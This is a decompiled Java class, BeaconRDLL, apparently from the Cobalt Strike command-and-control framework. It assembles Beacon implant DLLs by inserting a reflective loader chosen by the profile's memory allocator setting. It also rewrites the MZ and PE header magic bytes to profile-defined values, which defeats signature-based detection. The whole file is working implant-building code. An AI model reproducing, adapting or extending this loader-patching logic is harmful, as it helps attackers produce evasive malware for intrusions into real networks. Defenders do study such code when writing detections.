/*
 * Decompiled with CFR 0.152.
 */
package pe;

import c2profile.Profile;
import common.AssertUtils;
import common.CommonUtils;
import common.ReflectiveDLL;
import common.ReflectiveLoaderInfo;
import common.SleevedResource;
import pe.BeaconLoader;
import pe.OBJExecutableSimple;

public class BeaconRDLL {
    protected Profile profile;
    protected String arch;
    protected byte[] MZ_header;
    protected byte[] PE_header;

    public BeaconRDLL(Profile profile, String string) {
        this.profile = profile;
        this.arch = string;
        AssertUtils.TestArch(string);
        this.MZ_header = profile.getStringAsBytes(".stage.magic_mz_" + string);
        this.PE_header = profile.getStringAsBytes(".stage.magic_pe");
    }

    public byte[] getPatch(int n) {
        if ("x86".equals(this.arch)) {
            return BeaconLoader.getDOSHeaderPatchX86(this.MZ_header, n);
        }
        if ("x64".equals(this.arch)) {
            return BeaconLoader.getDOSHeaderPatchX64(this.MZ_header, n);
        }
        return new byte[0];
    }

    public String getLoaderFile() {
        String string = this.profile.getString(".stage.allocator");
        String string2 = "";
        string2 = "HeapAlloc".equals(string) ? "resources/BeaconLoader.HA." + this.arch + ".o" : ("MapViewOfFile".equals(string) ? "resources/BeaconLoader.MVF." + this.arch + ".o" : "resources/BeaconLoader.VA." + this.arch + ".o");
        return string2;
    }

    protected byte[] getReflectiveLoaderFunction() {
        byte[] byArray = SleevedResource.readResource(this.getLoaderFile());
        OBJExecutableSimple oBJExecutableSimple = new OBJExecutableSimple(byArray);
        oBJExecutableSimple.parse();
        oBJExecutableSimple.processRelocations();
        if (oBJExecutableSimple.hasErrors()) {
            CommonUtils.print_error("RDLL parser errors:\n" + oBJExecutableSimple.getErrors());
            throw new RuntimeException("Can't parser rDLL loader file:\n" + oBJExecutableSimple.getErrors());
        }
        AssertUtils.TestRange(oBJExecutableSimple.getCodeSize(), 1024, 5120);
        byte[] byArray2 = oBJExecutableSimple.getCode();
        byte[] byArray3 = new byte[5120];
        for (int i = 0; i < 5120; ++i) {
            byArray3[i] = byArray2[i % byArray2.length];
        }
        return byArray3;
    }

    protected void fixLoaderPE(byte[] byArray) {
        if (this.PE_header[0] == 80 && this.PE_header[1] == 69) {
            return;
        }
        if (this.PE_header.length != 2) {
            return;
        }
        byte[] byArray2 = new byte[]{};
        byte[] byArray3 = new byte[]{};
        if ("x86".equals(this.arch)) {
            byArray2 = new byte[]{80, 69, 0, 0, 117, 2};
            byArray3 = new byte[]{this.PE_header[0], this.PE_header[1], 0, 0, 117, 2};
        } else if ("x64".equals(this.arch)) {
            byArray2 = new byte[]{80, 69, 0, 0, 117, 2};
            byArray3 = new byte[]{this.PE_header[0], this.PE_header[1], 0, 0, 117, 2};
        }
        CommonUtils.patch(byArray, byArray2, byArray3);
    }

    protected void fixLoaderMZ(byte[] byArray) {
        if (this.MZ_header.length < 2) {
            return;
        }
        if (this.MZ_header[0] == 77 && this.MZ_header[1] == 90) {
            return;
        }
        byte[] byArray2 = new byte[]{};
        byte[] byArray3 = new byte[]{};
        if ("x86".equals(this.arch)) {
            byArray2 = new byte[]{77, 90, 0, 0, 117};
            byArray3 = new byte[]{this.MZ_header[0], this.MZ_header[1], 0, 0, 117};
        } else if ("x64".equals(this.arch)) {
            byArray2 = new byte[]{77, 90, 0, 0, 117};
            byArray3 = new byte[]{this.MZ_header[0], this.MZ_header[1], 0, 0, 117};
        }
        CommonUtils.patch(byArray, byArray2, byArray3);
    }

    protected void setPE(ReflectiveLoaderInfo reflectiveLoaderInfo, byte[] byArray) {
        if (this.PE_header[0] == 80 && this.PE_header[1] == 69) {
            return;
        }
        int n = reflectiveLoaderInfo.peHeaderLocation;
        byArray[n + 0] = this.PE_header[0];
        byArray[n + 1] = this.PE_header[1];
    }

    public byte[] process(byte[] byArray, ReflectiveLoaderInfo reflectiveLoaderInfo) {
        byte[] byArray2 = this.getPatch(reflectiveLoaderInfo.offset);
        byte[] byArray3 = this.getReflectiveLoaderFunction();
        this.fixLoaderMZ(byArray3);
        this.fixLoaderPE(byArray3);
        this.setPE(reflectiveLoaderInfo, byArray);
        ReflectiveDLL.setReflectiveLoader(byArray, byArray3, reflectiveLoaderInfo);
        CommonUtils.memcpy(byArray, byArray2, byArray2.length);
        if ("x64".equals(this.arch)) {
            AssertUtils.Test(reflectiveLoaderInfo.isBeaconX64(), "Asked to provide x64 patch to x86 Beacon DLL");
        } else {
            AssertUtils.Test(!reflectiveLoaderInfo.isBeaconX64(), "Asked to provide x86 patch to x64 Beacon DLL");
        }
        AssertUtils.Test(byArray2.length <= 60, this.arch + " DOS header is too big. Expect a crash");
        AssertUtils.Test(reflectiveLoaderInfo.offset > 0, "Could not find ReflectiveLoader export in DLL");
        return byArray;
    }
}

